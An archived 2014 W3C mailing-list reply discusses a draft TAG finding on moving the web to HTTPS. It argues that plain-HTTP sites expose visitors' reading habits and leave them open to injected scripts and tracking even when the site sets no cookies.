Re: Fwd (TAG): Draft finding - "Transitioning the Web to HTTPS"

On Dec 19, 2014, at 1:25 PM, Eric J. Bowman <eric@bisonsystems.net> wrote:
> 
> David Singer wrote:
> 
>> 4) A discussion of the point from web-sites “look, all my content is
>> public, I have nothing to hide and hence nothing to secure” maybe
>> needs addressing?  (“You may not, but you are exposing your
>> customers/visitors by insisting on plain HTTP.”)
> 
> Yes. I don't use cookies, so I don't understand what I'm exposing
> visitors to by stubbornly insisting on HTTP. My site visitors seem to
> be at greater risk by using their CC's at Sony or Target or...

It does seem like it would be useful for the TAG finding to explicitly address this point.

To summarize, sites are still exposing information about their users when they force visitors to use HTTP, even if there are no authentication cookies. In particular, the user’s reading habits are exposed (which page on your site are they reading? does that page contain words of political interest?). Non-authentication cookies are used to surveil users or identify them for more invasive attack [0].

Also, without integrity guarantees, HTTP sites expose their users to the risk of running any script the attacker wishes to introduce, including potentially asking for access to sensitive device APIs. Network attackers can also introduce identifiers or modify content for HTTP browsing. That is, integrity also helps with confidentiality and other privacy concerns [1].

Nick

[0] https://freedom-to-tinker.com/blog/englehardt/how-cookies-can-be-used-for-global-surveillance/
[1] Very well, I repeat myself: http://lists.w3.org/Archives/Public/public-web-security/2014Dec/0007.html

Received on Friday, 19 December 2014 22:36:34 UTC